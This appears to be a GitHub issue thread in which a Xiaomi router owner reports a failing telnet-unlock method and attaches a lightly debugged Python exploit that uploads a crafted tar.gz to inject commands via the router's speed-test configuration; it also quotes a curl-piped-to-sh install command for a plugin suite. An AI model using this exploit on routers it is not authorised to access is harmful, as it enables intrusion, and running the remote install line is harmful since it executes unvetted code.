code 1629
Closed this issue · 1 comments
{"code":1629,"msg":"解压失败,可能文件已经损坏"}
I'm one of the first users of this method, but I only used the "telnet" method, without flashing OpenWrt firmware.
The "telnet" worked well until approximately May 1st, before I installed the Aria2 Ngrok on MIXBOX. Before the day, I only had ShadowSocks on MIXBOX, and it worked well.
Finding the "telnet" method in unaccessible, I reset the official firmware 2.28.62. But can't use "telnet" still. Then I started to look into the "remote_command_execution_vulnerability.py" and its dependencies, then made some debug prints, as is shown in attachment.
I personally think the reason for the first-broken-down is low ROM in 4A-Gibit. It can't install too many plugins. And a completely erase in memory may help, but I don't know how......
I really appreciate it if someone can help me restore "telnet".
First run on win 10. Bug appeared and tried ubuntu 20.04LTS, both failed with {"code":1629,"msg":"解压失败,可能文件已经损坏"}
Besides, I found it unnecessary to flash OpenWrt firmware if you only want the very SSR.
I installed MIXBOX on my 4A-Gibit using "telnet" command line
sh -c "$(curl -kfsSl https://monlor.coding.net/p/mbfiles/d/mbfiles/git/lfs/master/install.sh)" && source /etc/profile &> /dev/null
MIXBOX is really easy to handle, and most importantly, it will never get your router bricked.
Attachment:
remote_command_execution_vulnerability.py
#!/usr/bin/python
# There is a remote command execution vulnerability in Xiaomi Mi WiFi R3G before version stable 2.28.23.
# The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress,
# so you can control the contents of the files in the decompressed directory.
# In addition, the application's sh script for testing upload and download speeds will read the url list from /tmp/speedtest_urls.xml,
# and there is a command injection vulnerability.
# discoverer: UltramanGaia from Kap0k & Zhiniang Peng from Qihoo 360 Core Security
# HOW TO RUN
# Install requirements
# pip3 install -r requirements.txt
# Run the script
# python3 remote_command_execution_vulnerability.py
import os
import shutil
import tarfile
import requests
router_ip_address = input("Router IP address: ")
# router_ip_address = "192.168.0.21"
# get stok
stok = input("stok: ")
# stok = "eeb59f33a51cd46649cd4ad1e3f50ecf"
# From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09
# In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
command="((sh /tmp/script.sh exploit) &)"
# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}
if os.path.exists("build"):
shutil.rmtree("build")
else:
print('no build')
os.makedirs("build")
## make config file
speed_test_filename = "speedtest_urls.xml"
with open("speedtest_urls_template.xml","rt",encoding='utf-8') as f:
template = f.read()
data = template.format(router_ip_address=router_ip_address, command=command)
print(data)
with open("build/speedtest_urls.xml",'wt',encoding='utf-8') as f:
f.write(data)
print('write')
# Make tar
with tarfile.open("build/payload.tar.gz", "w:gz",encoding='utf-8') as tar:
tar.add("build/speedtest_urls.xml", "speedtest_urls.xml")
tar.add("script.sh")
print('taring')
# tar.add("busybox")
# tar.add("extras/wget")
# tar.add("extras/xiaoqiang")
## upload config file
print("start uploading config file...")
r1 = requests.post("http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok), files={"image":open("build/payload.tar.gz",'rb')}, proxies=proxies)
print(r1.text)
# ## exec download speed test, exec command
# print("start exec command...")
# r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok), proxies=proxies)
# # print(r2.text)
# print("done! Now you can connect to the router using telnet (user: root, password: none)")
# print("In MacOS, execute in the terminal:")
# print("telnet {}".format(router_ip_address))
Sorry, I cant help you, seems like a pretty complex setup the one you are working with. I would suggest try to simplify your setup. You can try to ask in the OpenWrt forum